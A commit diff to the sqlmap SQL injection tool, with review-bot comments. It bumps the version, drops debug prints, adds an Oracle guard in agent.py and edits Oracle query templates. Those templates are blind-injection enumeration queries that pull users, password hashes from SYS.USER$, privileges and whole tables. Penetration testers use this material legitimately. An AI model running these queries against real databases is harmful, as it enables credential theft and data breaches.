

Commit 2f406b3

committed
Minor adjustments
1 parent c05f600 commit 2f406b3

4 files changed

Lines changed: 13 additions & 11 deletions


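--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -176,6 +176,9 @@ def nullAndCastField(self, field):
 @rtype: C{str}
 """
 
+if field.upper().endswith(", ROWNUM AS LIMIT"):
+return field
+
 nulledCastedField = queries[kb.dbms].cast % field
 nulledCastedField = queries[kb.dbms].isnull % nulledCastedField
 
@@ -450,6 +453,8 @@ def limitQuery(self, num, query, fieldsList=None):
 limitStr = queries[kb.dbms].limit % (num, 1)
 limitedQuery += " %s" % limitStr
 
+# TODO: fix for Partial UNION query SQL injection technique both
+# Oracle and Microsoft SQL Server
 elif kb.dbms == "Oracle":
 limitedQuery = "%s FROM (%s, %s" % (untilFrom, untilFrom, limitStr)
 limitedQuery = limitedQuery % fromFrom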
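Review bot: The early return added to nullAndCastField keys on the hard-coded suffix `, ROWNUM AS LIMIT`, which duplicates the alias text of the Oracle `<limit>` template in xml/queries.xml; if either side is edited the guard silently stops matching and the whole `col, ROWNUM AS LIMIT` expression gets wrapped by the `cast` and `isnull` templates on the next two lines. Consider deriving the marker from the template instead of a literal, or at least leave a comment on the check: `# Oracle's limit template appends ", ROWNUM AS LIMIT" to the field; don't wrap that alias in cast/NVL (keep in sync with xml/queries.xml)`. Note that `.upper()` makes the comparison case-insensitive, so the guard does not depend on the casing used in queries.xml. Both nullAndCastField and limitQuery continue outside these hunks.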

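--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -30,7 +30,7 @@
 
 
 # sqlmap version and site
-VERSION = "0.6.4-rc1"
+VERSION = "0.6.4-rc2"
 VERSION_STRING = "sqlmap/%s" % VERSION
 SITE = "http://sqlmap.sourceforge.net"
 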

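--- a/lib/techniques/inband/union/test.py
+++ b/lib/techniques/inband/union/test.py
@@ -131,9 +131,6 @@ def unionTest():
 else:
 value, columns = __unionTestByNULLBruteforce(comment)
 
-print value
-print columns
-
 if columns:
 setUnion(comment, columns)
 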

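--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -65,7 +65,7 @@
 <length query="LENGTH(%s)"/>
 <isnull query="NVL(%s, ' ')"/>
 <delimiter query="||"/>
-<limit query="ROWNUM AS limit %s) WHERE limit"/>
+<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
 <limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
 <limitgroupstart/>
 <limitgroupstop/>
@@ -83,30 +83,30 @@
 <is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER AND GRANTED_ROLE='DBA')='DBA'"/>
 <users>
 <inband query="SELECT USERNAME FROM SYS.ALL_USERS"/>
-<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS limit FROM SYS.ALL_USERS) WHERE limit=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
+<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
 </users>
 <passwords>
 <inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
-<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS limit FROM SYS.USER$ WHERE NAME='%s') WHERE limit=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
+<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
 </passwords>
 <privileges>
 <inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" condition="GRANTEE"/>
-<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS limit FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE limit=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'"/>
+<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'"/>
 </privileges>
 <!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
 <dbs/>
 <tables>
 <!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
 <inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
-<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS limit FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE limit=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
+<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
 </tables>
 <columns>
 <inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"/>
-<blind query="SELECT COLUMN_NAME FROM (SELECT COLUMN_NAME, ROWNUM AS limit FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s') WHERE limit=%d" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"/>
+<blind query="SELECT COLUMN_NAME FROM (SELECT COLUMN_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s') WHERE LIMIT=%d" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"/>
 </columns>
 <dump_table>
 <inband query="SELECT %s FROM %s"/>
-<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS limit FROM %s) WHERE limit=%d" count="SELECT COUNT(*) FROM %s"/>
+<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
 </dump_table>
 </dbms>
 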
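Review bot: The alias `LIMIT` used across these Oracle templates is a generic word, so in the dump_table blind template `SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d` a target table that itself has a column named LIMIT would presumably make the outer `WHERE LIMIT=` ambiguous and the query fail; a less collision-prone alias such as `SQLMAP_ROWNUM` would avoid that, but it must be changed together with the `", ROWNUM AS LIMIT"` suffix check in lib/core/agent.py and the `limitregexp` pattern, which is what couples these files. Since that agent.py check upper-cases the field before comparing, the `limit` to `LIMIT` rename here is cosmetic on its own. A comment above the `<limit>` element naming the coupling would help the next editor: `<!-- alias must match the ", ROWNUM AS LIMIT" check in lib/core/agent.py nullAndCastField -->`.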
